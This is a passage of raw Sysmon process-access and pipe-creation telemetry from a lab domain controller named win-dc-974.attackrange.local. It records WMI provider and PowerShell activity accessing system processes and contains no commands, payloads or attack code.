16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-73AA-00000000AD01}10076C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-73AA-00000000AD01}10076C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002236634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-70AA-00000000AD01}3652\PSHost.132591775718325090.3652.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002236633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-73AA-00000000AD01}100763648C:\Windows\system32\conhost.exe{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6